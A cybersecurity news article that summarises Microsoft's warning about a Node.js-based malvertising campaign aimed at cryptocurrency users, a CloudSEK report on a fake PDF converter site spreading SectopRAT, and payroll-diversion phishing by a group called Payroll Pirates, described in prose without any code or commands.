Microsoft Warns of Ongoing Node.js-Based Malware Campaign Targeting Crypto Users

Microsoft has issued an alert about a persistent malvertising campaign that leverages Node.js to deploy malware aimed at stealing sensitive data and exfiltrating system information.

The campaign, which dates back to October 2024, primarily targets cryptocurrency enthusiasts. Attackers lure victims by promoting fake versions of popular trading platforms like Binance and TradingView, tricking them into downloading malicious installers from deceptive websites.

These installers come bundled with a malicious dynamic-link library named “CustomActions.dll.” This DLL collects basic system details using Windows Management Instrumentation (WMI) and creates a scheduled task to ensure persistence on the infected device.

To maintain the illusion of legitimacy, the DLL also launches a browser window using “msedge_proxy.exe” to show the real cryptocurrency trading site. This executable can make any webpage appear as a standalone application, helping the attackers remain under the radar.

While the victim is distracted, the scheduled task runs PowerShell commands to fetch additional scripts from a remote server. These scripts exclude both the PowerShell process and the malware’s directory from Microsoft Defender scans to avoid detection.

The next stage involves downloading a compressed file containing the Node.js runtime and a compiled JavaScript (JSC) file. The Node.js executable runs the JSC script, which establishes external connections and likely harvests sensitive browser data.

Microsoft also observed an alternate infection route involving the ClickFix method. In this version, attackers execute inline JavaScript using a PowerShell command that directly runs code through the Node.js binary without needing external files. 

“Node.js, an open-source JavaScript runtime used widely by developers, is now being misused by attackers to camouflage malicious activity within seemingly legitimate applications,” Microsoft noted. “This technique allows them to bypass traditional security measures and maintain persistence in target environments.”

Separately, cybersecurity firm CloudSEK reported another case of social engineering using a fake PDF-to-DOCX converter website mimicking PDF Candy. The bogus site hosted at candyxpdf[.]com employs the ClickFix tactic to trick users into executing encoded PowerShell commands. These commands install the SectopRAT (aka ArechClient2), a powerful information-stealing malware.

Security researcher Varun Ajmera highlighted that the attackers painstakingly cloned the real website’s design and registered similar domains to deceive users more effectively.

Meanwhile, phishing campaigns are also on the rise, with cybercriminals using PHP-based kits to impersonate HR departments. These scams aim to hijack access to payroll systems and reroute salary payments to accounts controlled by the attackers.

Some of these activities have been linked to a threat group known as Payroll Pirates, who are using malicious ads and spoofed HR portals often via Google’s sponsored search results to harvest employee credentials and 2FA codes.